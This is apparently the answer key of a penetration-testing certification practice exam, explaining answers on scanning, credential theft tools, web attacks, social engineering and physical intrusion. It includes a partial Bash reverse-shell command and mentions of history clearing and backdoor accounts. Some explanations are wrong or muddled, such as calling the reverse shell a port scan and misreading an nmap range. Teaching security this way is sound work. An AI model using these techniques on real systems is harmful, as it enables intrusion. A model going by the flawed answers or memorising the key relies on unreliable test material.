1. A and E. A container can be used to create an isolated environment, much like a virtual machine. As a result, any applications running within a container environment may not be detectable by traditional vulnerability scans. Unlike a virtual machine, a container shares much of the base operating system with the container host. Therefore, vulnerabilities associated with the base operating system of the container host may be inherited by its containers.

Answer 557

1. A. In a standard phishing exploit, email messages are sent indiscriminately to a large number of individuals, hoping that a percentage of them will click the malicious link contained in the message.

Answer 558

1. D. A black box penetration test should simulate the view an external attacker would have of the network. Therefore, the tester should have little or no knowledge of the internal network.

Answer 559

1. A. Impacket is a collection of Python classes for working with network protocols. Impacket provides a wide range of tools, including the ability to authenticate with hashes once you have captured them. Metasploit’s SMB capture mode, Responder, and Wireshark can all capture SMB hashes from broadcasts, but in this scenario, you also want the ability to authenticate with hashes once you’ve captured the messages.

Answer 560

1. A. A discovery scan is designed to simply map out every system on the target network. As such, it uses very nonintrusive mechanisms (such as ping) to enumerate the network.

Answer 561

1. A. Credentialed scans are scans in which the scanning computer has an account on the computer being scanned that allows the scanner to do a more thorough check looking for problems that may not be seen from the network. Credentialed scans are widely used in enterprise vulnerability management programs and are a useful tool when performing a penetration test. Credentialed scans may access operating systems, databases, and applications. Credentialed scans typically only retrieve information from target servers and do not make changes to the server itself.

Answer 562

1. A and B. The SNMPv1 protocol is an older protocol that uses the concept of a community string instead of a password. The same community string is used to authenticate to every SNMPv1 host in the network. By convention, most SNMPv1 administrators set the community string to a value of public. Even if a unique community string were used, it was easy to discover because it was transmitted as clear text on the network.

Answer 563

1. A. Impersonation is a social engineering technique that can be used by a penetration tester to gain physical access to the target’s facility. In this scenario, the receptionist allowed the tester to access the organization’s facility because the tester appears to be from a trusted vendor.

Answer 564

1. D. All of the options shown in this question will cause nmap to detect services running on the target host. However, only the –sV option can be used with nmap to detect the version number of those services.

Answer 565

1. B, C, and D. Shell upgrade, VM escape, and container escape are all examples of sandbox escape exploits.

Answer 566

1. B. In this scenario, since the penetration tester discovered a critical vulnerability, the tester should immediately alert the client with the details of the findings.

Answer 567

1. A. nmap is the most commonly used command-line vulnerability scanner and is a free, open source tool. It provides a broad range of capabilities, including multiple scan modes intended to bypass firewalls and other network protection devices. nmap is a port scanner. To scan for ports, you will want to use -p (only scan specified ports). This option specifies which ports you want to scan and overrides the default scan. Individual port numbers or ranges are acceptable. Ranges are separated by a hyphen (e.g., 1-1023). The beginning and/or end values of a range may be omitted, causing nmap to use 1 and 65535, respectively. So, you can specify -p- to scan ports from 1 through 65535. Port scanning a system simply requires that nmap be installed and that you provide the target system’s hostname or IP address.

Answer 568

1. A. X11 forwarding can be used to remotely manage Linux systems over a network connection using a graphical user interface.

Answer 569

1. A. The U.S. government’s Computer Emergency Response Team (CERT) maintains a website at [http://www.us-cert.gov](http://www.us-cert.gov) that contains a regularly updated summary of the most frequent, high-impact types of security incidents currently being reported to CERT.

Answer 570

1. A. The chage command can be used on Linux systems to configure password aging for user accounts. For example, it can be used to lock a user account if the user doesn’t change their password after a certain number of days.

Answer 571

1. B. A risk assessment typically involves identifying areas of vulnerability or potential weakness and providing a road map to a stronger security posture. In this scenario, the client fully understands that the penetration testing could cause disruptions to their network, and they are willing to accept those risks.

Answer 572

1. B. Because the tester is using an internal email account (the kind used by a typical employee) to conduct the test, the tester is most likely performing a gray box test. In a black box test, the tester would have to use an external email account. In a white box test, the tester would likely use elevated privileges and access to conduct the test.

Answer 573

1. C. reg save saves a copy of specified subkeys, entries, and values of the registry in a specified file. A file with the .reg file extension is a registration file used by the Windows Registry. These files can contain hives, keys, and values.

Answer 574

1. B. The nslookup utility can be used to resolve a domain name into its associated IP address.

Answer 575

1. B. A *critical findings* communication trigger happens when a penetration tester discovers a security vulnerability so serious that it must be addressed immediately instead of waiting until the test has been completed.

Answer 576

1. B. A full scan interrogates each host discovered on the target network using intrusive methods. A full scan is usually detected (and possibly blocked) quickly by IDS or IPS devices. Because of this, full scans are more likely to be used by a defender to thoroughly test his or her network. A penetration tester is less likely to use a full scan because it can be detected so quickly. The exception would be a white box test where everyone is already expecting the penetration tester to be running vulnerability scans.

Answer 577

1. D. This is an example of a DLL hijacking exploit. The malicious DLL likely contains the same functions that the original DLL did, allowing applications that rely on it to function correctly. However, it can also contain malicious code that executes when the DLL is loaded.

Answer 578

1. A. The nmap –T*n* option is used to specify a timing template, where *n* is a number between 0 and 5. The higher the number, the faster the vulnerability scan. The lower the number, the slower the scan.

Answer 579

1. A. The \>= relational operator can be used in both Python and Ruby to test whether one value is numerically greater than or equal to the other.

Answer 580

1. D. Responder is a toolkit that is used to answer NetBIOS queries from Windows systems on a network. Responder is a powerful tool when exploiting NetBIOS responses. It can target individual systems or entire local networks, allowing you to analyze or respond to NetBIOS name services pretending to be the system that the query is intended for.

Answer 581

1. B. Mimikatz is an open source utility that enables the viewing of credential information from the Windows Local Security Authority Subsystem Service (LSASS) using its sekurlsa module, which includes plaintext passwords and Kerberos tickets, which can then be used for attacks such as pass-the-hash and pass-the-ticket attacks. In this scenario, however, the question states “over the wire.” Mimikatz is the only tool that cannot be used that way.

Answer 582

1. D. Red team assessments are typically more targeted than normal penetration tests. The red team acts like an attacker, targeting sensitive data or systems with the goal of acquiring access. Goal-based or objective-based assessments are usually designed to assess the overall security of an organization. Compliance-based assessments are designed to test compliance with specific laws.

Answer 583

1. A. Network Mapper (Nmap) is used to discover hosts and services on a computer network by sending packets and analyzing the responses. Nmap will identify what devices are running on a client’s systems, discover hosts and services that are available, find open ports, and detect security risks. In this scenario, the organization did not disable Telnet because port 23 is still open. Telnet is a client-server protocol, based on a reliable connection-oriented transport. Typically, this protocol is used to establish a connection to Transmission Control Protocol (TCP) by using port 23, where a Telnet server application (telnetd) is listening.

Answer 584

1. C. Requiring multiple sign-offs on payouts is an example of a process-based mitigation strategy.

Answer 585

1. A. The Internet of Things (IoT) refers to the network of physical products and devices that connect to the Internet. Manufacturers and developers want to minimize costs to increase their profits. Hence, security is often not the key feature of the product or device. So, as with any other device on a network, IoT devices may have security vulnerabilities and may be subject to network-based attacks.

Answer 586

1. B. The term *de-escalation* refers to the process of communicating between the client and the tester to cease exploits used during the penetration test because of the adverse effects they may be having on the network.

Answer 587

1. A, D, and F. A penetration tester will want to immediately report more serious issues with the client directly. Some of these will be documented in the report to the client at the end of testing; however, there are a few times when a penetration tester should call the client immediately, and they are as follows: to report any critical findings, report any indicators of compromise, or to report if the server becomes unresponsive to the testing.

Answer 588

1. B. Cross-site scripting (XSS) attacks occur when web applications allow an attacker to perform HTML injection, inserting their own HTML code into a web page. In this scenario, the attacker is attempting to manipulate an HTML iframe with JavaScript code using a web browser.

Answer 589

1. B. A script kiddie may have a variety of motivations. One of the most common is attention. They frequently brag about their exploits in online forums and social media. A malicious insider is usually motivated by either revenge or financial gain. An organized crime actor is most likely motivated by financial gain. A nation-state is most likely motivated by political or military goals.

Answer 590

1. D. In this scenario, the question specifically states “name resolution requests.” In this case, Responder is the best choice. Responder is a toolkit used to answer NetBIOS queries from Windows systems on a network. Tcpdump is a type of packet analyzer software utility that monitors and logs TCP/IP traffic passing between a network and the computer on which it is executed. Ettercap is a free and open source network security tool for man-in-the-middle attacks on LAN. Medusa is a brute-force login attack tool that supports a variety of protocols and services.

Answer 591

1. C. SOAP is an API standard that relies on XML and related schemas. XML-based specifications are governed by XML Schema Definition (XSD) documents. Having a good reference of what a specific API supports can be valuable for a penetration tester. This question specifically asks about XML files, so the SOAP project files would be the most beneficial.

Answer 592

1. B and C. You could use either Burp Suite or OWASP ZAP. Both of these tools could be used to intercept network traffic flowing between users running a web browser and the target organization’s web application server. By proxying a connection, the penetration tester can read the contents of the intercepted traffic.

Answer 593

1. A. In this scenario, the tester should recommend that the client enable HTTP Strict Transport Security (HSTS). An HSTS response header lets a website tell browsers that it should be accessed using only HTTPS, instead of using HTTP. It is an opt-in security enhancement that is specified by a web application through the use of a special response header. Once a supported browser receives this header, that browser will prevent any communications from being sent over HTTP to the specified domain and will instead send all communications over HTTPS.

Answer 594

1. B. When making a comparison between two values in a Python script to see whether they are equal, you use the == relational operator.

Answer 595

1. C. Applications developed in-house aren’t usually subjected to the same level of scrutiny as commercial applications, which make them possible attack vectors that can be exploited. For example, when generating sample application requests, most penetration testers throw unexpected information at applications developed in-house to see how the application responds. For example, you may find that entering a very long text string into a field that is expecting only eight characters could generate a buffer overflow error. You could then use this poor error handling behavior to insert and run malicious code on the web server hosting the application.

Answer 596

1. A. On a Windows system, cPassword is the name of the attribute that stores passwords in a Group Policy Preference item. Whenever a preference requires a user’s password to be saved, it gets stored within this attribute in encrypted format. However, the password can be easily decrypted by any authenticated user in the domain.

Answer 597

1. C. Adding the TargetHost = gets line to a Ruby script causes it to accept input entered at the command line by the user and assign it to a variable named TargetHost.

Answer 598

1. A. Double-tagging of VLAN tags is allowed in the 802.1q specification. This allows a host to “hop” between VLANs.

Answer 599

1. A. This is an example of DNS poisoning. This exploit leverages the trust users have in a URL that appears to be valid. Because users enter a valid URL, they have no idea than an exploit is being conducted. However, the DNS server itself has been reconfigured to resolve the domain name in URL to the IP address of the malicious server.

Answer 600

1. B. Attackers (and penetration testers) seek to undermine the goals of the CIA triad model using the corresponding goals of the DAD triad. The A in DAD stands for alteration, which refers to making unauthorized changes to information or systems.

Answer 601

1. A. Remote Procedure Call (RPC)/Distributed Component Object Model (DCOM) is used on Windows systems and allows you to remotely execute code on a different Windows system.

Answer 602

1. C. The Web Application Description Language (WADL) is an XML-based machine-readable description of HTTP-based web services. As such, it is typically used with REST services instead of SOAP.

Answer 603

1. B and D. To harden user accounts on a Windows-based computer system, you should use Group Policy to enforce password complexity requirements. For example, you could require a certain password length and that it contain specific character combinations. You should also use Group Policy to enforce password aging requirements. This requires users to change their passwords on a regular basis.

Answer 604

1. D. Adding the puts TargetHost line to a Ruby script causes it to display the value of a variable named TargetHost on the screen.

Answer 605

1. A. By searching the Internet for the operating system version number displayed under Operating System, you can likely discover the default administrative username and password used by the device. Several high-profile exploits over the last few years have been facilitated by the fact that the system implementer failed to change the default username and password used by network infrastructure devices.

Answer 606

1. D. The process of enumeration involves connecting to each host discovered on the network segment and identifying key information. In this example, notice that the OS class of the device is as follows: * Type: **WAP** * Vendor: **Belkin** * OS Family: **Embedded** * From this information, you can reasonably infer that this device is a wireless access point.

Answer 607

1. A. When creating your written report of findings after completing a penetration test, you should provide a high-level synopsis of the test and the results in the Executive Summary. Typically, this is the first section of the report and is intended for less-technical audiences.

Answer 608

1. A and C. Part of the scoping process is to determine whether the penetration test will assess the organizations susceptibility to a specific known vulnerability or whether it should investigate unknown vulnerabilities. Because this is an external black box test, the client probably won’t provide user accounts or physical access to their facility.

Answer 609

1. B. The for looping structure will process a specified number of times.

Answer 610

1. A. Dumpster diving occurs when an attacker searches through the target organization’s garbage looking for sensitive information.

Answer 611

1. B. Gray box tests are a combination of black box and white box testing. A gray box test may provide some information about the environment to the penetration testers without giving full access, credentials, or configuration details. A gray box test can help focus penetration testers’ effort and time while providing a precise view of what the malevolent insider would actually encounter. In a black box penetration test, the tester has no prior knowledge of the target. In a white box test, the tester has extensive knowledge of the target.

Answer 612

1. A and B. To ensure persistence of the compromise, you could create a backdoor into the system or create a user account for yourself.

Answer 613

1. D. A whaling attack is essentially a form of spear phishing attack that is aimed specifically at C-suite employees, such as the CEO, CFO, COO, CIO, and so on. A standard spear phishing attack, on the other hand, would have been sent to a lower-level employee within the organization.

Answer 614

1. A. Generally speaking, if you were to rank threat actors into tiers from least threatening to most threatening, it would look something like the following: script kiddie \> hacktivist \> malicious insider \> organized crime \> nation-state.

Answer 615

1. D. In RFID cloning, the penetration tester captures the RFID signature from a legitimate RFID device and then copies it to a fake device. This is commonly done to copy an RFID access badge.

Answer 616

1. C. The nmap 192.168.1.1 -sT command causes the nmap utility to conduct a TCP connect scan of the specified target system.

Answer 617

1. A. This output was created by John the Ripper. This credential testing tool is a brute-force password cracking utility. In this example, the root user’s password (toor) has been discovered.

Answer 618

1. D. Open source intelligence (OSINT) tools and techniques are those that go through publicly available information for organizational and technical details that might prove useful during the penetration test. OSINT is information that can be gathered easily. OSINT is often used to determine the organization’s footprint, which includes a listing of all of the systems, networks, and other technology that an organization has.

Answer 619

1. D. A statement of work (SOW) defines what work will be done during an engagement. A SOW is a document that defines the purpose of the test, what tests will be done, what will be created, the timeline for the test to be completed, the price for the testing, and any additional terms and conditions. The MSA defines the terms that the organizations will use for any future work. NDAs are legal documents that enforce the confidential relationship between two parties. NDAs outline the parties involved, what information should be considered confidential, how long the agreement lasts, when/how disclosure is acceptable, and how confidential information should be handled. The tester’s detailed invoice to the client is just an invoice and is not a legal document.

Answer 620

1. B. Requiring a user to supply a password (something you know) plus a security token generator (something you have) constitutes multifactor authentication.

Answer 621

1. B. When creating your written report of findings after completing a penetration test, you should identify the standard or guidelines you used to conduct the test in the Methodology section. In this example, you would inform the reader that you used the NIST 800-115 methodology.

Answer 622

1. C and D. The programmer should be sure to include routines that tell the application what to do should it encounter an error condition. For example, many buffer overflow attacks exploit applications that don’t know how to respond when they receive more information than they were expecting. Likewise, all applications should have their code digitally signed. This will expose any unauthorized modifications made to the code.

Answer 623

1. D. In this scenario, the question specifically states “name resolution requests.” In this case, Responder is the best choice. Responder is a toolkit used to answer NetBIOS queries from Windows systems on a network. Tcpdump is a type of packet analyzer software utility that monitors and logs TCP/IP traffic passing between a network and the computer on which it is executed. Ettercap is a free and open source network security tool for man-in-the-middle attacks on LAN. Medusa is a brute-force login attack tool that supports a variety of protocols and services.

Answer 624

1. D. Each of the open source research sources listed in this question may contain information that you could use to find known vulnerabilities in an older version of the IIS web server software.

Answer 625

1. C. The “Minimum password age” Group Policy setting determines how long a user must keep the same password before being allowed to change it to a new one. Until that time period has elapsed, the user is forced to keep the same password. This prevents users from making constant changes to their password in an attempt to circumvent the “Enforce password history policy” setting.

Answer 626

1. B. A black box test is designed to simulate an external attack. The penetration testers should have the same perspective that a typical external attacker would have. Therefore, they should be located in a similar manner, that is, in any external location.

Answer 627

1. D and E. You could use either Kismet or WiFite to try to break the target organization’s wireless network. You could also use Aircrack-ng to accomplish this.

Answer 628

1. C. If a tester has access to a Windows workstation or server, then they can use PowerSploit, which provides the toolkit needed to maintain persistence and to perform further reconnaissance. The testing will want to exploit the HKEY\_CURRENT\_USER registry hive. The HKEY\_CURRENT\_USER hive is meant to be available only to the currently logged on user. So, when a different Windows user logs onto the system, a different copy of the HKEY\_CURRENT\_USER registry hive is loaded. The HKEY\_CURRENT\_USER registry hive is saved locally as the file NTUSER.DAT or USER.DAT when a user logs off. This registry hive can be opened in Notepad, and the encrypted login ID and password can be easily located. If the user has a roaming profile, then the NTUSER .DAT file will be saved on every workstation the user logged onto.

Answer 629

1. C. Because you are scanning only web servers, you can probably constrain the vulnerability scan to just those ports and protocols commonly used by web servers. Performing a thorough scan of all ports and protocols would take considerably longer.

Answer 630

1. B. APK Studio is a tool that you can use to reverse engineer an APK executable and analyze it for vulnerabilities.

Answer 631

1. D. The default port used by the TFTP service is 69. TFTP provides a quick and easy way to transfer files between hosts over a network connection. Unlike FTP, TFTP uses the connectionless UDP Transport Layer protocol instead of TCP. The lack of acknowledgments allows a TFTP server to transfer files faster than an FTP server. However, TFTP is an insecure protocol. All information transmitted between the FTP server and client is sent unencrypted. In addition, TFTP doesn’t provide a means for authenticating connections. Therefore, anyone can connect to the service and transfer files without providing authentication credentials.

Answer 632

1. B. In this scenario, the question states that the penetration tester is writing a report “that outlines the overall level of risk.” Given this statement, the tester will be including this information in the executive summary. The executive summary is the most important section of the report. It should be written in a manner that conveys all the important conclusions of the report in a clear manner that is written in “layman’s terms.” A tester should explain what was discovered in plain language and describe the risks to the business in terms that the client will understand.

Answer 633

1. D. Using reg add adds a new subkey or entry into the registry. The syntax is as follows: reg add /v /t /d * KeyName specifies the full path of the subkey or entry to be added. * /v specifies the name of the registry entry to be added under the specified subkey. * /t specifies the type for the registry entry. * /d specifies the data for the new registry entry. * Penetration testers often focus on using the easiest attack vector to achieve their objectives. One common attack method is a tool called Mimikatz. It can steal cleartext credentials from the memory of compromised Windows systems. When the WDigest Authentication protocol is enabled, plaintext passwords are stored in the Local Security Authority Subsystem Service (LSASS), exposing them to theft. WDigest is disabled by default in Windows 10.

Answer 634

1. B. The bash history keeps a record of all commands executed by a tester on the Linux command line. This allows the tester to easily run previously executed commands by using the up and down arrow keys to scroll through the command history file. The main reason for removing command-line history from the Linux terminal is to prevent another user from using the tester’s previous commands. To delete or clear all the entries from bash history, use the history command with the -c option: $ history -c.

Answer 635

1. A. Social engineering targets people instead of computers and relies on individuals or groups breaking security procedures, policies, and rules. Social engineering can be done in person, over the phone, by text messages, or by email. In this scenario, the attacker used the social engineering principle of authority. Authority follows the belief that people will tend to obey authority figures, even if they are asked to perform objectionable acts.

Answer 636

1. D. Many wireless devices use a Wi-Fi Protected Setup (WPS) system to make connecting to the wireless network easier. However, most WPS implementations have a key weakness in that they use a simple eight-digit pin for authenticating wireless devices. Because of its short length, the pin can be cracked quite quickly, allowing a penetration tester to easily connect to a target wireless network.

Answer 637

1. C. Sqlmap is an open source tool used to automate SQL injection attacks against web applications with database back-ends. Sqlmap is a commonly used open source database vulnerability scanner that allows security administrators to probe web applications for database vulnerabilities. For this scenario, Sqlmap is a dedicated database vulnerability scanner and is the most appropriate tool.

Answer 638

1. C. Notice that this device is running Windows Server 2012 and that it has port 53 open, which is the default port for a DNS server. It is reasonable to infer, therefore, that this server is a domain controller. The Active Directory role on a Windows server requires the DNS role. While the DNS role could be located on a different member server, the Active Directory is almost always installed on the same server as the DNS role.

Answer 639

1. B and C. The LLMNR protocol has many security vulnerabilities that can be exploited in a penetration test. For example, it lacks security controls such as authentication. Because of this, a malicious host on the network can advertise itself as any host it wants to.

Answer 640

1. D. Red team assessments are usually more targeted than normal penetration tests. Red teams attempt to act like an attacker by targeting sensitive data or systems with the goal of acquiring data and access. Red team assessments are not intended to provide details of all the security flaws that a target has. Red teams can be useful as a security exercise to train incident responders or to help validate security designs and practices.

Answer 641

1. A. Censys is a web-based tool that probes a given IP address. It is a search engine that helps penetration testers discover, monitor, and analyze devices that are accessible from the Internet. Censys lets researchers find specific hosts and create summative reports on how devices, web sites, certificates, and ciphers used are deployed.

Answer 642

1. B. In this scenario, a command was entered, and the attacker was attempting to gain access to the password file within the /etc directory. Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via vulnerable applications. Command injection attacks are possible when an application passes unsafe user-supplied data (forms, cookies, HTTP headers, etc.) to a system shell.

Answer 643

1. B and D. In this example, the device is running a web server on ports 80 and 443. Ports 515, 631, and 9100 are all used to provide network printing.

Answer 644

1. B. The #!/bin/bash element must be included at the beginning of every Bash shell script.

Answer 645

1. A. The CERT database contains information about recent security updates released by software and hardware vendors and a description of the vulnerabilities they are intended to address.

Answer 646

1. C. The Common Weakness and Enumeration (CWE) database is a community-developed resource that can be accessed at [http://cwe.mitre.org](http://cwe.mitre.org). The CWE database contains a list of publicly known cybersecurity vulnerabilities associated with software in general instead of a specific product.

Answer 647

1. A. This is an example of a credential brute-forcing attack. In a true brute-force attack, all possible letter, number, and special character combinations would be tried one after another until the right one is found. However, by creating a list of likely passwords based on the user’s personal interests, the probability of success is greatly increased.

Answer 648

1. D. This is an example of a replay attack. The tester captures valid handshake data from the wireless network and they replays it later to authenticate his laptop to the wireless network.

Answer 649

1. C and D. The PCI-DSS standard requires that organizations that handle credit card processing conduct both internal and external penetration tests at least once per year. They can perform them more frequently, if desired, but they are not required to. These organizations must also conduct penetration testing after they make a significant change to the network infrastructure.

Answer 650

1. B. Most people will respond to a request to act if they are made to fear the consequences of failing to act. This is one of the most basic human motivations.

Answer 651

1. A and C. Either the –p http,https option or the –p 80,443 option can be used with nmap to scan a host for a web server service.

Answer 652

1. D. When creating your written report of findings after completing a penetration test, you should report your risk ratings in the Metrics and Measures section. These ratings allow the reader to prioritize risks as well as make comparisons between penetration tests conducted over time.

Answer 653

1. B. The best defense a system administrator has against kernel exploits is to keep their operating systems updated with the latest patches from the vendor. The Common Vulnerabilities and Exposures (CVE) database contains vulnerability information for known Windows, Mac OS, Linux, UNIX, Android, and iOS operating system kernels.

Answer 654

1. A and D. While SSHv1 uses encrypted data transmissions, it is not considered to be as secure as SSHv2. However, many older Linux or UNIX systems may still be configured to use SSHv1. Likewise, TLS 1.2 is considered to be more secure than SSL 2.0.

Answer 655

1. A. With badge cloning, the tester can clone the badge of a staff member to gain entry into the facility. One of the most common techniques is to clone radio-frequency identification (RFID) tags. Given this scenario of trying to obtain access both during business hours and after hours, badge cloning is the best option.

Answer 656

1. C. People are naturally motivated by a respect for authority. When they believe someone in authority wants them to do something, they will frequently comply, especially if the request is coupled with a sense of urgency.

Answer 657

1. A. The netcat utility could be used to set up a reverse shell exploit that allows the tester to remotely control the compromised system.

Answer 658

1. B. In a credentials brute-force attack, the tester will try to log in to the application using every username and password. Hydra is a brute-forcing tool that can crack systems using password guessing.

Answer 659

1. A. Most automatically locking door systems have some type of emergency fail open mechanism. The idea behind this is that if there is an emergency of some sort, such as a fire, then the doors must automatically unlock to prevent people from being trapped inside or preventing emergency personnel from entering. If you can figure out what fail open mechanism is used, you may be able to manually trigger it to open a locked door.

Answer 660

1. A. In the Bash shell, a network socket can be opened to pass data through it. A TCP socket can be opened using /dev/tcp//. Bash is attempting to open a TCP connection to the corresponding socket. So, in this example, a port scan has been performed. * Here’s a breakdown of the code: * /bin/bash -i: Invokes an interactive Bash shell. * \> &/dev/tcp//: Pipes that shell to the tester. * 0&1: Takes standard input and connects it to standard output. It does the same with standard error (2\>).

Answer 661

1. B. A *critical findings* communication trigger happens when a penetration tester discovers a security vulnerability so serious that it must be addressed immediately instead of waiting until the test has been completed.

Answer 662

1. D. The nmap 192.168.1.1-254 –p 23 command causes the nmap utility to scan the specified range of IP addresses for hosts with Telnet port 23 open.

Answer 663

1. C. If the nmap command is run without specifying a timing option, then the –T3 option is used by default. This tells nmap to scan in *normal* mode.

Answer 664

1. C. Cybersecurity professionals use the well-known CIA triad model to describe the goals of information security. The letter A in CIA stands for availability, which ensures that information remains available for authorized access.

Answer 665

1. B. Chmod is a command and system call that is used to change the access permissions of file system objects (files and directories). Chmod 4111 (chmod a+rwx,u-rw,g-rw, o-rw,ug+s,+t,g-s,-t) sets permissions so that (U)ser / owner can’t read, can’t write, and can execute. (G)roup can’t read, can’t write and can execute. (O)thers can’t read, can’t write, and can execute. sudo is a program for Unix-like computer operating systems that allows users to run programs with the security privileges of another user, by default the superuser. In this scenario. the command chmod 4111 /usr/bin/sudo will misconfigure sudo.

Answer 666

1. B. A compliance-based assessment is required in this scenario. This is a risk-based assessment that ensures policies or regulations are being followed appropriately. Most likely, the credit card companies will provide the organization with a checklist that the penetration tester will use to conduct the assessment. A goal-based assessment will specify a goal to be met by the test. A supply chain assessment involves testing an organization’s vendors. A red team assessment is usually conducted by internal testers to ensure an organization’s IT staff (the blue team) can adequately defend the network.

Answer 667

1. C. In this scenario, a black box penetration test is being run. By definition, the tester is located somewhere outside the target’s network. As such, she has to compromise an internal host first. Once done, she can pivot and use it to scan other internal hosts.

Answer 668

1. C. Because the hosts to be scanned do not have contiguous IP addresses, you must specify each host individually. In this case, the nmap 192.168.1.10 192.168.1.11 192.168.1.12 192.168.1.13 192.168.1.15 -sU command causes the nmap utility to conduct a UDP port scan of each specified system.

Answer 669

1. C and D. At a minimum, you need a tension wrench and a lock pick tool to pick a lock. The tension wrench is used to apply rotational pressure to the lock (in the unlock direction). The lock pick tool is used to release each of the pins within the lock.

Answer 670

1. B. In this scenario, the .. operators are the revealing giveaway that the attacker was attempting to conduct a directory traversal attack. This particular attack sought to break out of the web server’s root directory and access the /etc/passwd file on the server. A directory traversal attack is an HTTP attack that allows attackers to access restricted directories and execute commands outside of the web server’s root directory.

Answer 671

1. A. When creating an associative array in a Bash script, you use the following syntax: *array\_name*[*element\_name*] = *value*. In this example, the line Target[HostName] = FS1 assigns a value of FS1 to the element named HostName within the Target array.

Answer 672

1. B. An *indicator of prior compromise* communication trigger happens when a penetration tester discovers that the network or a system has already been compromised previously by another attacker. In this situation, the tester usually communicates the discovery with the client immediately instead of waiting until the test is complete.

Answer 673

1. C. This is an example of a redirect attack because users are redirected to a fake website by the phishing emails.

Answer 674

1. D. This is an example of a Kerberos exploit. Receiving a ticket-granting ticket (TGT) allows the user to obtain additional ticket-granting service (TGS) tickets, which grant access to specific network services. Because it allows users to get other TGS tickets, the TGT is sometimes referred to as a *golden ticket*. Because the TGS ticket can be used only to access a specific network service, it is sometimes referred to as a *silver ticket*.

Answer 675

1. D. Badge cloning occurs when an attacker makes a copy of a valid access badge to enter a facility. By copying a valid badge’s RFID signature, the penetration tester in this scenario can use the fake badge to access the target organization’s facility using the authorized employee’s credentials. Because he carefully selected a high-level employee’s badge for cloning, he may be able to access more sensitive areas of the facility.

Answer 676

1. A. The penetration tester is using fear as a motivating factor. Whether the claim is true or not, the CFO knows that such a revelation could damage his family and career. It could also expose him to prosecution. This could potentially motivate him to divulge sensitive information.

Answer 677

1. D. Fence jumping occurs when an unauthorized person simply jumps over a physical barrier designed to control access. In this scenario, the penetration tester simply steps over the turnstile that is designed to prevent unauthorized people from entering.

Answer 678

1. C. Throttling the scan to use minimal bandwidth will slow down the scanning process considerably. However, it will also make the scans less visible to the IDS/IPS devices and also allow them time to more thoroughly fingerprint network devices.

Answer 679

1. B and C. Given this scenario, the word let does not need to be included in the script, so it can be removed, and in Bash, the equivalent to = is -eq, which is the arithmetic binary operator. Once these modifications are made, the script will work as expected.

Answer 680

1. A. The most important step in the penetration testing planning and scoping process is to obtain written permission from the target to perform the test. Without written permission, you are considered a hacker and are subject to federal, state, and local laws regarding computer crime (such as U.S. Code, Title 18, Chapter 47, Sections 1029 and 1030).

Answer 681

1. A. Web Services Description Language (WSDL) is an XML-based interface definition language used for describing the functionality offered by a SOAP service.

Answer 682

1. B. In a repeating attack, the penetration tester captures the target organization’s wireless network radio signal and rebroadcasts it with high gain to extend its range. In this scenario, the organization’s wireless network can now be accessed by the penetration tester from the parking lot.

Answer 683

1. D. In this scenario, your scans were detected by an intrusion protection system (IPS), and as a result, the IP address used by your laptop got put on a blacklist. Now, all the devices on the client’s network are dropping packets with the blacklisted IP address.

Answer 684

1. C. Using parameterized queries is typically considered a better defense against SQL injection attacks than sanitizing user input. With parameterized queries, prepared statements are used with bounded variables to access the SQL database.

Answer 685

1. B. SQLmap can be used to brute-force crack the password for an SQL database.

Answer 686

1. D. During a penetration test, a tester may want to configure their scans to run as stealth scans, which go to great lengths to avoid using tests that might attract attention. Service disruptions, error messages, and log entries caused by scans may attract attention from the cybersecurity team that causes them to adjust defenses in a manner that obstructs the penetration test. Using stealth scans better approximates the activity of a skilled attacker, resulting in a more realistic penetration test.

Answer 687

1. A. The nmap 192.168.1.10-13 -sA command causes the nmap utility to conduct a TCP ACK scan of the target systems with IP addresses of 192.168.1.10, 192.168.1.11, and 192.168.1.13.

Answer 688

1. C. The Common Vulnerabilities and Exposures (CVE) database is a community-developed resource that can be accessed at [http://cve.mitre.org](http://cve.mitre.org). The CVE database contains a list of publicly known cybersecurity vulnerabilities. Whenever a vendor anywhere in the world discovers a vulnerability with their product, they add an entry to the CVE database. The goal is to make a common resource that everyone can use, instead of each individual vendor maintaining their own database containing just vulnerabilities associated with their products.

Answer 689

1. A. The Local Administrator Password Solution (LAPS) is a Microsoft tool that manages administrative credentials. It is for randomizing local administrator account credentials using Active Directory. Limited Administrator Password Assistance (LAPA) does not exist. Nessus is a vulnerability scanner, and Metasploit is an exploitation framework used to execute and attack networks.

Answer 690

1. A. Because the server room is protected by a relatively unsophisticated locking mechanism, the penetration tester could pick the lock to gain access, assuming he has the necessary lock-picking skills. Note that this would have to be done in an area without surveillance or foot traffic as it may take some time to complete.

Answer 691

1. C. A web-enabled television set is an example of a nontraditional system. These devices are considered fragile because they are difficult to manage in the traditional sense. and they are probably updated on an infrequent basis by the vendor. They may also have not been subjected to extensive security testing by the vendor.

Answer 692

1. C. The programmer in this scenario has used hidden elements in the HTML code. This is an unsecure coding practice that can result in sensitive information being stored in the user’s browser (the DOM).

Answer 693

1. B. Most likely, the client has implemented a network access control (NAC) system. Your laptop didn’t meet the criteria required by NAC to connect to the secure network, so it was quarantined on an isolated remediation network where it can access a remediation server (the other host on the network) to come into compliance.

Answer 694

1. A. One option you could try in this scenario is to decompile the application’s executable. This process will reveal the application’s assembly-level code that you can analyze for weaknesses.

Answer 695

1. A and E. When documenting problem handling and resolution in a rules of engagement document, you should clearly define escalation procedures on both sides of the agreement to help minimize downtime for the target organization. You should also include verbiage that requires the client to acknowledge that penetration testing carries inherent risks. A timeline for the engagement, along with scoping information, is also included in the ROE, just not in the problem resolution section.

Answer 696

1. B. This is an example of ARP spoofing. In this exploit, the tester sends a fake ARP broadcast on the network segment that maps the IP address of a legitimate network host to her MAC address. As a result, all traffic addressed to the legitimate host gets redirected to the tester’s system.

Answer 697

1. D. Two-factor authentication (2FA) requires users to supply factors from two different categories. In this case, requiring a user to supply a username (something you know), a PIN (something you know), and a facial recognition scan (something you are) constitutes 2FA authentication.

Answer 698

1. A. Although Nikto is usually considered a vulnerability scanner used by penetration testers, it can also be used by system administrators to verify configuration compliance within their networks, specifically with the configuration of their web servers.

Answer 699

1. A and D. Because the test will include both the target organization’s network as well as service provided by the third-party SaaS provider, you must obtain written permission from both entities before performing the penetration test. Failure to obtain either one could expose you to prosecution and/or litigation.

Answer 700

1. A. The -Pn option tells nmap to scan a host (or an entire subnet) without actually discovering hosts. This type of scan should be avoided during a penetration test because it takes a long time; each port on each IP address in the range is scanned, regardless of whether the IP address is valid. Because of this, it also creates a tremendous amount of traffic that may be detected by an IDS or IPS tool.

Answer 701

